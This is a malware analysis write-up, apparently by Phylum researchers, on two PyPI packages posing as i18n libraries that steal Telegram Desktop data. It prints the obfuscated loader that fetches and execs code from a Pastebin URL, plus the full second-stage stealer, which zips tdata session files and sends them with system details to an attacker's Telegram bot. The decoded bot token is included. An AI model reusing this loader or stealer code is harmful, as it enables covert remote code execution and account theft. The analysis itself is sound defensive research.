Obfuscated PyPI Packages Purporting to be i18n Libraries Actually Stealing Telegram Data

Phylum discovered two packages published to PyPI on October 28 that claim to be libraries for simplifying internationalization. The files were highly obfuscated and upon further inspection were found to contain malicious code designed to steal sensitive Telegram Desktop application data and system information, which it then sends to an attacker-controlled Telegram channel.

Overview

The packages in question are called localization-utils and locute. localization-utils was published first and went through four iterations over ~30 minutes. A few hours later the locute package was published and went through five iterations over ~90 minutes. The changes across version releases were minimal and seemed mostly to do with trying to get the MEMORY_OFFSET constant imported correctly (more on this later). In both packages, the obfuscated code ends up pulling a non-obfuscated final malicious payload from a remote Pastebin URL that is dynamically executed.

The Obfuscated Code

In both packages the file that contains the obfuscated code is called inset.py. Here are its contents:

from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET
M = 0x18C

DEFAULT_LOCALE = "en"

globe = globals

_ = "".join
__ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [103, 101, 116, 97, 116, 116, 114]]))
___ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [95, 95, 105, 109, 112, 111, 114, 116, 95, 95]]))
____ = getattr(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([chr(______) for ______ in [99, 104, 114]]))

def __get_kernel_ato32_locale_driver():
    __api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))
    __addr = __(__api.request, _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))]]))(_([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2)):]])).read()

    __(globe()[_([chr(______) for ______ in [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]])], _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0))]]))(__addr)

def __exexute_offset_moving():
    __kernel_api = ___(_([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 2) + (1 << 0)):M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1))]]))
    __excutor = __(__kernel_api, _([____(x) for x in MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 3) + (1 << 2) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2))]]))

    __excutor(target=__get_kernel_ato32_locale_driver).start()

__exexute_offset_moving()

First, it’s interesting to see the attacker goes through the effort of trying to disguise this file to look like low-level memory or kernel interaction code or something of that nature. Second, there’s a variety of obfuscation techniques present here; we see a combination of character obfuscation, dynamic function calls, and bitwise operations.
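
To make the character obfuscation concrete, here is a minimal sketch that decodes the integer lists used on the three alias lines of inset.py. The helper name decode and the constant names are ours, chosen for illustration; they do not appear in the package.

```python
def decode(codes):
    """Turn a list of character codes into the string it spells."""
    return "".join(chr(c) for c in codes)


# Integer lists copied from the alias definitions in inset.py
BUILTINS = [95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95]
GETATTR = [103, 101, 116, 97, 116, 116, 114]
IMPORT = [95, 95, 105, 109, 112, 111, 114, 116, 95, 95]
CHR = [99, 104, 114]

for codes in (BUILTINS, GETATTR, IMPORT, CHR):
    print(decode(codes))
# __builtins__
# getattr
# __import__
# chr
```

Nothing here executes the package's code; the lists are only converted to text, which is a safe way to inspect this style of obfuscation.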

Notice that the first line of this file imports what seems like a necessary memory offset constant from a “memory normalizer” utility (whatever that might be). If we pull this thread, however, we find a bit of attempted import misdirection. Taking a look in memory_normalizer/__init__.py, we find the following:

from .headers import P1

__all__ = (
    "P1",
)

Looks innocuous enough, but let’s peek in memory_normalizer/headers.py. That file contains only a long list of integers:

P1 = [117, 114, 108, 108, 105, 98, 46, 114, 101, 113, 117, 101, 115, 116, 117, 114, 108, 111, 112, 101, 110, 101, 120, 101, 99, 116, 104, 114, 101, 97, 100, 105, 110, 103, 84, 104, 114, 101, 97, 100, 104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 87, 78, 114, 97, 106, 97, 86, 75]

On its own, this might pass for legitimate data in one of the supporting files of a well-organized package. But let’s go back to inset.py, knowing now that this long list of integers is what the code refers to as MEMORY_OFFSETS. The first reference to MEMORY_OFFSETS is in the __api variable definition:

__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))

The attacker uses a complex combination of slicing, bitwise operations, and dynamic function invocation to obscure what’s really going on here. Given the underscore variables defined earlier in the code:

  • _ is set to "".join, a function to concatenate lists of strings.
  • __ is an alias for getattr, a function to access an attribute of an object.
  • ___ is an alias for __import__, a function to import modules during runtime.
  • ____ is an alias for chr, a function to convert ASCII codes to characters.

we can evaluate the code defining __api to see that it is aliasing urllib. The next line defines __addr which, now knowing that __api is really urllib, uses urllib.request to fetch something from a remote URL. Let’s quickly work through what URL is being dynamically generated here:

  1. MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]:
    • This slice operation decodes to urllib.request.
    • The bitwise operation M ^ ((1 << 8) + (1 << 7) + (1 << 1)) calculates the end index of the slice.
    • M is defined earlier as 0x18C, which is 396 in decimal. The shifts sum to 386, and 396 ^ 386 is 14, so the slice operation is equivalent to MEMORY_OFFSETS[:14], which is exactly the 14 characters of urllib.request.
  2. MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 1)):M ^ ((1 << 8) + (1 << 7) + (1 << 4) + (1 << 3) + (1 << 0))]:
    • This slice decodes to urlopen, a function in the urllib.request module for opening URLs.
    • The slice bounds are computed with the same kind of bitwise operations and evaluate to 14 and 21, so this is MEMORY_OFFSETS[14:21].
  3. MEMORY_OFFSETS[M ^ ((1 << 8) + (1 << 7) + (1 << 5) + (1 << 2)):]:
    • The start index evaluates to 40, so this slice is MEMORY_OFFSETS[40:]. It decodes to the URL https://pastebin.com/raw/WNrajaVK, which is the target of the HTTP request.
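
The slice arithmetic above can be checked with a short sketch. It evaluates every boundary expression that appears in inset.py and decodes each resulting segment of P1. The helper bits and the variable names are ours, introduced only for illustration.

```python
M = 0x18C  # 396, as defined in inset.py

# Contents of P1 from memory_normalizer/headers.py
P1 = [
    117, 114, 108, 108, 105, 98, 46, 114, 101, 113, 117, 101, 115, 116,
    117, 114, 108, 111, 112, 101, 110,
    101, 120, 101, 99,
    116, 104, 114, 101, 97, 100, 105, 110, 103,
    84, 104, 114, 101, 97, 100,
    104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105,
    110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 87, 78, 114, 97, 106, 97,
    86, 75,
]


def bits(*positions):
    """Sum of (1 << p) terms, mirroring the shift expressions in inset.py."""
    return sum(1 << p for p in positions)


# Slice boundaries, in increasing order, as written in the obfuscated code
bounds = [
    M ^ bits(8, 7, 1),
    M ^ bits(8, 7, 4, 3, 0),
    M ^ bits(8, 7, 4, 2, 0),
    M ^ bits(8, 7, 5, 3, 2, 1),
    M ^ bits(8, 7, 5, 2),
]
print(bounds)  # [14, 21, 25, 34, 40]

# Decode each segment between consecutive boundaries
edges = [0, *bounds, len(P1)]
segments = ["".join(chr(c) for c in P1[a:b]) for a, b in zip(edges, edges[1:])]
for segment in segments:
    print(segment)
# urllib.request
# urlopen
# exec
# threading
# Thread
# https://pastebin.com/raw/WNrajaVK
```

Read in order, the segments spell out the whole loader: import urllib.request, call urlopen on the Pastebin URL, pass the response to exec, and do all of that on a threading.Thread.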

Let’s navigate there and figure out what’s getting pulled from that URL. Here’s the code found there:

# https://pastebin.com/WNrajaVK

import json
import os
import platform
import socket
import subprocess
import time
import zipfile
from pathlib import Path

import requests

CHAT_ID = "-1002009496950"
TOKEN = "".join([chr(________________ ^ 257) for ________________ in [311, 312, 306, 308, 309, 305, 308, 311, 308, 305, 315, 320, 320, 324, 358, 330, 335, 376, 372, 343, 347, 375, 357, 373, 332, 344, 341, 352, 365, 366, 356, 305, 300, 331, 306, 379, 306, 365, 305, 360, 305, 361, 324, 375, 333, 324]])

def send_message(message_text):
    global TOKEN, CHAT_ID, requests

    base_url = f"https://api.telegram.org/bot{TOKEN}/sendMessage"

    requests.get(base_url, data={"text": message_text, "chat_id": CHAT_ID})

def send_file(file_path):
    global TOKEN, CHAT_ID, requests

    url = f"https://api.telegram.org/bot{TOKEN}/sendDocument"

    requests.post(
        url, data={"chat_id": CHAT_ID}, files={"document": open(file_path, "rb")}
    )

def get_system_report():
    global platform, socket, json, requests

    info = {}
    info["platform"] = platform.uname()
    info["platform-release"] = platform.release()
    info["platform-version"] = platform.version()
    info["architecture"] = platform.machine()
    info["hostname"] = socket.gethostname()
    info["ip-address"] = requests.get("http://api.ipify.org/").text
    info["processor"] = platform.processor()

    return json.dumps(info, indent=4)

system = platform.system()

if system == "Linux":
    tdata_dir = ".local/share/TelegramDesktop/tdata/"
else:
    tdata_dir = "AppData/Roaming/Telegram Desktop/tdata"

tdata_dir = Path.home() / Path(tdata_dir)

try:
    send_message(f"TARGET: '''{get_system_report()}'''")
    if tdata_dir.is_dir():
        subprocess.call(
            ["taskkill", "/f", "/im", "Telegram.exe"],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )

        time.sleep(0.5)

        name = ""
        with open("debug.zip", "wb") as tmp:
            zf = zipfile.ZipFile(tmp, "w")
            for path in tdata_dir.rglob("*"):
                if path.is_file():
                    if os.stat(path).st_size < 10 * 1024:
                        zf.write(path.absolute(), path)

            zf.close()

            name = tmp.name

            send_message(f"TG FOUND!!\\n{system}")

        send_file(name)
        os.remove(name)

    else:
        message_text = send_message(f"ERROR TG NOT FOUND!!\\n{system} {tdata_dir}")
except Exception as e:
    pass

Aside from the Telegram Bot Token, nothing in this file is obfuscated so it’s fairly easy to see what’s going on here. The code is designed to:

  1. Collect system information such as platform, architecture, hostname, and IP address.
  2. Search for Telegram Desktop application data and compress the files smaller than 10 KiB into a zip file.
  3. Send the system information and compressed Telegram Desktop data to an attacker-controlled Telegram channel.

For reference, the Telegram Bot Token is obfuscated using a character-code technique similar to the one seen in the local files, with the extra step that each integer is XORed with 257 before being passed to chr. It evaluates to: 6935405650:AAEgKNyuVZvdtMYTaloe0-J3z3l0i0hEvLE.
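
As a small illustration of that decoding step, the sketch below applies the same XOR to the first eleven integers of the TOKEN list, which cover the numeric bot ID and the colon separator. The names KEY, encoded_prefix, and decoded_prefix are ours.

```python
KEY = 257  # XOR key used in the payload's TOKEN expression

# First eleven integers of the TOKEN list in the Pastebin payload
encoded_prefix = [311, 312, 306, 308, 309, 305, 308, 311, 308, 305, 315]

# XOR is its own inverse, so applying the key again recovers the characters
decoded_prefix = "".join(chr(value ^ KEY) for value in encoded_prefix)
print(decoded_prefix)  # 6935405650:
```

Because 257 is 0b100000001, the XOR only flips the lowest bit and bit 8 of each character code. That is enough to push every value outside the printable ASCII range, so the list does not decode to anything readable with chr alone.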

A Note About the MEMORY_OFFSET Import

As mentioned earlier, the first line of inset.py defines the import

from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET

However, if you pay close attention you’ll notice that the references in the rest of the code to this variable contain an “S” at the end. E.g.

__api = ___(_([____(x) for x in MEMORY_OFFSETS[:M ^ ((1 << 8) + (1 << 7) + (1 << 1))]]))

As also mentioned earlier, our diff analyzer indicates that the only diffs between versions of localization-utils are around this import statement. Presumably this was the attacker trying to figure out why the code wasn’t working during their testing. With all the obfuscation and import misdirection, it appears they simply didn’t notice a typo in the code: the code after the import references MEMORY_OFFSETS with an “S” on the end, while the name bound by the import has no “S”. This would result in a NameError at runtime, and the diffs we’re seeing are most likely the attacker trying to debug this.
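
The failure mode is easy to reproduce in isolation. In this minimal sketch a short stand-in list replaces the real import, and the function name use_offsets is hypothetical; only the singular and plural variable names are taken from inset.py.

```python
# Stand-in for: from .utils_p.memory_normalizer import P1 as MEMORY_OFFSET
MEMORY_OFFSET = [117, 114, 108]


def use_offsets():
    # The rest of inset.py uses the plural name, which was never bound
    return MEMORY_OFFSETS[:2]


try:
    use_offsets()
except NameError as err:
    error_message = str(err)
    print(error_message)
```

Python resolves names only when the line runs, so the module imports without complaint and the error surfaces only when the function that touches MEMORY_OFFSETS is called.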

Conclusion

These packages show a dedicated and elaborate effort to avoid detection via static analysis and visual inspection by employing a variety of obfuscation techniques. The code initiates a series of actions that involve importing modules and functions dynamically, constructing a URL, fetching additional code, and executing it, with the end goal of stealing sensitive Telegram data. These packages serve as yet another stark reminder of the critical nature of dependency trust in our open source ecosystems. Given the extensive obfuscation and the intent to mislead present in these packages, there is a substantial risk that such a package might go unnoticed during a cursory visual inspection.

Phylum Research Team

Hackers, Data Scientists, and Engineers responsible for the identification and takedown of software supply chain attackers.